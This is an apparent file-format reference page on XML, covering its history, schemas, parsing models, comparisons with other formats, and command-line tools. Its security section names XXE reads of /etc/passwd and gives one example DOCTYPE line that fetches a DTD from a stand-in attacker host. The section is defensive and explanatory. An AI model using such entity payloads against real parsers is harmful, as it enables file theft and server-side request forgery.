.XML Extensible Markup Language
.xml

Extensible Markup Language

XML encodes structured data as nested elements with attributes in human-readable, machine-parseable plain text. Standardized by the W3C in 1998, XML underpins document formats (DOCX, SVG), RSS feeds, SOAP services, banking standards (ISO 20022), and ZATCA e-invoicing — even as JSON dominates web APIs.

File structure
Header schema
Records structured data
TextW3C1998
Not convertible

Conversion not yet available. XML transformation requires XSLT or schema-aware processing — features under consideration for a future update.

Common questions

Why does my browser show 'This XML file does not appear to have any style information associated with it'?

This message appears when you open a raw XML file directly in a browser without an associated stylesheet. It is not an error — the browser simply has no instructions for visual rendering, so it displays the raw document tree instead. You commonly see this with XML sitemaps, RSS feeds, or API responses. The file itself is perfectly valid and well-formed.

What is the difference between XML and JSON?

XML uses matched opening and closing tags with attributes, supports namespaces, and offers formal schema validation through XSD. JSON uses a lighter curly-brace syntax that maps directly to programming language objects. JSON is 30 to 50 percent smaller for equivalent data and dominates modern web APIs, while XML remains essential in enterprise systems and regulated industries.

What is XXE injection and why is XML considered high-risk?

XXE injection exploits the DOCTYPE entity declaration to read server files or trigger requests to internal network resources. The Billion Laughs variant uses nested entity expansion to turn a few hundred bytes into gigabytes of memory consumption. Mitigation requires disabling external entity resolution and DTD processing in the parser configuration before handling untrusted input.

Is XML still used or has JSON replaced it?

JSON replaced XML for most web APIs, but XML remains deeply embedded in infrastructure. Every DOCX and XLSX file contains XML internally. SVG graphics, RSS feeds, Android manifests, Maven builds, banking wire transfers (ISO 20022), healthcare data (HL7 FHIR), and Saudi ZATCA e-invoicing all run on XML. The format lost surface visibility but is arguably more entrenched than ever.

What is the difference between well-formed and valid XML?

Well-formed XML follows syntax rules: proper nesting, quoted attributes, a single root element, and correct escaping of special characters. Valid XML is well-formed and additionally conforms to a schema (XSD, DTD, or RELAX NG) that defines permitted elements, attributes, and data types. A document can be well-formed without being valid.

How do I open and view an XML file?

Any web browser displays XML with a collapsible tree view. Text editors like VS Code, Notepad++, and Sublime Text provide syntax highlighting. For validation, use xmllint on the command line or an XML-aware editor like Oxygen XML Editor. XML is plain text, so even the simplest text editor can open it.

What is XSLT and how does it relate to XML?

XSLT (XSL Transformations) is a declarative language for converting XML documents into other formats. An XSLT stylesheet matches nodes in the source XML using template rules and outputs transformed content — HTML for web pages, a different XML vocabulary for system integration, or plain text for reports. XSLT is widely used in publishing workflows and enterprise data pipelines.

What makes .XML special

SGML lineage
Simplified from a 500-page ISO standard
XML is a direct descendant of SGML (ISO 8879, 1986), which powered defense and publishing but was too complex for the web. The W3C working group stripped SGML down to ten design principles. XML 1.0 shipped in February 1998.
Hidden empire
Lost the API war but powers everything underneath
JSON displaced XML for web APIs around 2012. But rename any .docx to .zip and you find XML inside. SVG is XML. RSS is XML. Android manifests, banking wire transfers (ISO 20022), and ZATCA e-invoicing all run on XML.
Frozen spec
5 editions in 26 years — then silence
XML 1.0 was published in 1998 and received its Fifth Edition in 2008. Since then, no revisions, no breaking changes, no deprecations. It is one of the most stable specifications in web technology history.
Billion Laughs
200 bytes of XML can consume 3 GB of RAM
The Billion Laughs attack defines nested entities that expand exponentially. Each level references the previous ten times. A few hundred bytes of crafted XML overwhelms the parser with gigabytes of expanded text, crashing the server.

Descended from SGML

Before XML existed, enterprises structured documents with SGML (Standard Generalized Markup Language), an ISO standard published in 1986. SGML was powerful but notoriously complex — its full specification ran to over 500 pages, and building a conformant parser required deep expertise. When the web exploded in the mid-1990s, the W3C assembled a working group led by Jon Bosak of Sun Microsystems to create a language that kept SGML's core strengths — self-describing structure, validation, extensibility — while discarding its complexity. The result, published as a W3C Recommendation on February 10, 1998, was XML 1.0. The design committee articulated ten principles in the specification's introduction: XML shall be straightforwardly usable over the internet, support a wide variety of applications, be compatible with SGML, make it easy to write programs that process XML documents, keep optional features to an absolute minimum, be human-legible and reasonably clear, be prepared quickly, be formal and concise, be easy to create, and treat terseness as being of minimal importance. That last point explains XML's verbosity — a deliberate design choice favoring clarity over compactness.

Continue reading — full technical deep dive

Well-formedness versus validity

XML enforces two tiers of document correctness. A document is well-formed if it follows the syntax rules: every opening tag has a matching closing tag (or uses self-closing syntax), elements nest without overlapping, attribute values are quoted, and exactly one root element exists. Every conformant XML parser rejects documents that are not well-formed — there is no error-recovery mode equivalent to HTML's lenient parsing.

A document is valid if it is well-formed and also conforms to a schema that defines which elements, attributes, and data types are permitted. Three schema languages compete for this role. DTD (Document Type Definition) is the oldest, inherited from SGML, and defines element grammar using a compact notation. XML Schema (XSD), published by the W3C in 2001, adds typed validation with inheritance, complex type definitions, namespace-aware constraints, and cardinality rules that DTDs cannot express. RELAX NG, developed by James Clark and Murata Makoto, offers a simpler, more readable alternative that many developers prefer for hand-authored schemas. Most XML encountered in practice is well-formed but never validated against a schema.

Namespaces and compound documents

When a single XML document combines vocabularies from different sources — an SVG graphic embedded in an XHTML page, or invoice line items alongside digital signature elements — element names from different vocabularies might collide. XML namespaces solve this by binding prefixes to URIs. A SOAP envelope might use the SOAP namespace for its structure while the payload uses a UBL namespace for invoice elements. The xmlns attribute declares these bindings, and prefixed element names like cbc:IssueDate make the vocabulary origin explicit. Namespaces are essential in enterprise XML but are one of the features that makes XML harder to work with than JSON, which has no namespace mechanism.

Transformation and querying

XSLT (XSL Transformations) is a declarative language for converting XML documents into other formats. An XSLT stylesheet contains templates that match nodes in the source document and output transformed content — HTML for web display, a different XML vocabulary for system integration, or plain text for reporting. XSLT 1.0, published in 1999, remains widely deployed. XSLT 3.0, published in 2017, added streaming support for transforming documents larger than available memory.

XPath provides the query language that XSLT and other tools use to address nodes within an XML tree. An expression like //product[@category='electronics']/price selects price elements under product elements with a matching category attribute anywhere in the document. XPath 1.0 handles most practical queries. XQuery extends XPath into a full query language comparable to SQL for XML databases.

DOM versus SAX parsing

Two fundamental parsing strategies exist for XML. DOM (Document Object Model) parsers read the entire document and build an in-memory tree structure that applications traverse and manipulate. This is convenient for small-to-medium documents but fails on large files because the tree consumes several times the document's file size in memory. SAX (Simple API for XML) parsers stream through the document, firing callbacks for start-element, end-element, and character-data events without building a tree. SAX is essential for processing multi-gigabyte XML feeds — financial transaction logs, scientific datasets, government data dumps — where DOM parsing would exhaust available memory. StAX (Streaming API for XML) provides a pull-based alternative where the application controls iteration.

Lost the API war, powers everything underneath

XML dominated web data interchange through the early 2000s. SOAP web services wrapped XML payloads in XML envelopes with XML schemas and XML security. The complexity was staggering. When REST architecture gained traction and JSON offered a simpler, more compact alternative that mapped directly to JavaScript objects, developers migrated en masse. By 2012, JSON had overtaken XML for new web APIs. Today, roughly 78% of public APIs use JSON.

But XML never disappeared. It retreated from the visible surface layer into the infrastructure. Every DOCX, XLSX, and PPTX file is a ZIP archive containing XML documents — rename one to .zip and extract it to see the XML inside. SVG, the web's vector graphics format, is XML. RSS and Atom feeds are XML. Android layouts and manifests are XML. Maven pom.xml files build most Java projects. SAML authentication assertions are XML. Banking wire transfers use ISO 20022 XML messages. Healthcare data exchanges run on HL7 FHIR, which supports XML alongside JSON. Saudi Arabia's ZATCA e-invoicing mandate requires UBL 2.1 XML for all electronic invoices. The narrative that "XML is dead" confuses the loss of API dominance with disappearance. XML is less visible but arguably more entrenched than ever in the systems that actually move money, documents, and data.

Stability as a feature

XML 1.0 has had exactly five editions from its initial publication in 1998 to the Fifth Edition in 2008. Since then — nothing. No sixth edition, no breaking changes, no deprecations. This makes XML 1.0 one of the most stable specifications in the history of web technology. For archival and preservation contexts, where a format must remain readable for decades, this stability record is a significant advantage. The Library of Congress catalogs XML under FDD fdd000075 as a recognized preservation format.

.XML compared to alternatives

.XML compared to alternative formats
Formats Criteria Winner
.XML vs .JSON
Verbosity
JSON represents equivalent data in 30-50% fewer bytes by eliminating closing tags, attribute syntax, and namespace declarations. This makes JSON faster to parse and cheaper to transmit over networks.
JSON wins
.XML vs .JSON
Schema validation
XSD provides typed validation with inheritance, complex type definitions, namespace-aware constraints, and cardinality rules. JSON Schema is capable but less mature for multi-namespace enterprise document validation.
XML wins
.XML vs .HTML
Error handling
XML parsers reject malformed documents immediately — no error recovery. HTML parsers are lenient by design, silently fixing unclosed tags and nesting errors. XML's strictness catches data corruption early.
XML wins
.XML vs .YAML
Enterprise adoption
XML dominates regulated industries — banking (ISO 20022), healthcare (HL7 FHIR), government (UBL invoicing), and legal (Akoma Ntoso). YAML is concentrated in DevOps and cloud-native tooling (Kubernetes, Docker Compose).
XML wins

Technical reference

MIME Type
application/xml
Developer
World Wide Web Consortium (W3C)
Year Introduced
1998
Open Standard
Yes — View specification

Binary Structure

XML is a text format with no binary structure or magic bytes. An XML document begins with an optional prolog: the XML declaration (<?xml version="1.0" encoding="UTF-8"?>) specifying the version and character encoding, followed by an optional DOCTYPE declaration referencing a DTD or defining inline entities. The document body consists of a single root element containing nested child elements delimited by matched start tags (<tag>) and end tags (</tag>), with empty elements using self-closing syntax (<tag/>). Elements carry attributes as name-value pairs within the start tag. Text content, CDATA sections (<![CDATA[...]]>), processing instructions (<?target data?>), and comments (<!-- ... -->) appear within or between elements. Namespaces use the xmlns attribute to partition element names into URI-identified vocabularies. UTF-8 is the default encoding; UTF-16 is also required for conformant parsers. Files may begin with a UTF-8 BOM (EF BB BF) before the declaration, though the W3C recommends against it. Well-formedness requires proper nesting, quoted attribute values, and a single root element. PRONOM identifies XML as fmt/101 using the <?xml declaration as the primary signature.

1986SGML (Standard Generalized Markup Language) published as ISO 8879 — XML's direct ancestor, designed for structured document markup in publishing and defense industries1998XML 1.0 published as a W3C Recommendation on February 10, designed by Jon Bosak's working group as a simplified subset of SGML for the web1999XSLT 1.0 and XPath 1.0 published by the W3C, enabling declarative transformation and querying of XML documents2001XML Schema (XSD) 1.0 published — a typed validation language replacing DTDs for complex enterprise schema enforcement2003SOAP 1.2 becomes a W3C Recommendation, establishing XML as the dominant web services protocol — peak XML-over-HTTP era2008XML 1.0 Fifth Edition published — the final revision, relaxing element name restrictions. Also: Office Open XML (OOXML) becomes ISO/IEC 295002012JSON overtakes XML for new web APIs as REST displaces SOAP. Douglas Crockford's RFC 4627 and browser-native JSON.parse() accelerate adoption2017XSLT 3.0 published with streaming support, enabling transformation of documents larger than available memory without full DOM loading
Validate XML well-formedness with xmllint other
xmllint --noout input.xml

Parses the file and reports well-formedness errors. The --noout flag suppresses document output on success, producing output only on error. Exit code 0 means well-formed. Part of libxml2, pre-installed on macOS and most Linux distributions.

Validate XML against an XSD schema other
xmllint --noout --schema schema.xsd input.xml

Validates the XML document against the specified XSD schema file. Reports both well-formedness and schema validation errors with line numbers. Useful for verifying invoice XML against UBL or ISO 20022 schemas.

Pretty-print and reformat XML other
xmllint --format input.xml > formatted.xml

Reformats XML with consistent indentation for readability. Useful for making minified XML from APIs or machine-generated output human-readable. Also implicitly checks well-formedness.

Extract values with XPath using xmlstarlet other
xmlstarlet sel -t -v '//product/name/text()' input.xml

Evaluates an XPath expression against the document and prints matching text. xmlstarlet supports full XPath 1.0 syntax. Install with apt install xmlstarlet (Debian/Ubuntu) or brew install xmlstarlet (macOS).

Parse XML and extract root tag with Python other
python3 -c "import xml.etree.ElementTree as ET; tree = ET.parse('doc.xml'); print(tree.getroot().tag)"

Uses Python's built-in ElementTree parser to read the XML and print the root element tag. Available without installing any packages. Note: ElementTree does not protect against XXE by default — use defusedxml for untrusted input.

Conversion not yet available. XML transformation requires XSLT or schema-aware processing — features under consideration for a future update.

HIGH

Attack Vectors

  • XXE (XML External Entity) injection — DOCTYPE entity declarations can reference local files (file:///etc/passwd), internal network URLs (SSRF), or parameter entities that exfiltrate data to attacker-controlled servers. OWASP ranks XXE as a top-10 web vulnerability.
  • Billion Laughs denial of service — exponentially expanding nested entity definitions (each referencing the previous ten times) consume gigabytes of RAM from a few hundred bytes of XML, crashing the parser and potentially the entire server.
  • SSRF via external DTD — an XML document referencing an external DTD (<!DOCTYPE foo SYSTEM 'http://attacker.com/evil.dtd'>) causes the parser to fetch a remote resource, enabling server-side request forgery behind firewalls.
  • XPath injection — user input concatenated into XPath expressions without sanitization allows authentication bypass and unauthorized data extraction from XML datastores, analogous to SQL injection for relational databases.

Mitigation: FileDex processes XML files entirely in the browser using the native DOMParser API. No external entity resolution, no DTD fetching, no server-side parsing. The browser's sandboxed context prevents filesystem access and network requests from parsed entities.

xmllint tool
Command-line XML validator and formatter from libxml2 — pre-installed on macOS and most Linux distributions
xmlstarlet tool
Command-line XML toolkit for querying (XPath), editing, validating, and transforming XML documents
lxml library
Python binding for libxml2/libxslt providing fast XML parsing, XPath queries, XSLT transforms, and schema validation
Saxon tool
XSLT 3.0 and XQuery 3.1 processor — the reference implementation for advanced XML transformations with streaming support
fast-xml-parser library
High-performance XML to JSON/JS-object parser for Node.js with no native dependencies
Professional XML authoring environment with visual XSD designers, XSLT debugging, and support for DITA, DocBook, and XHTML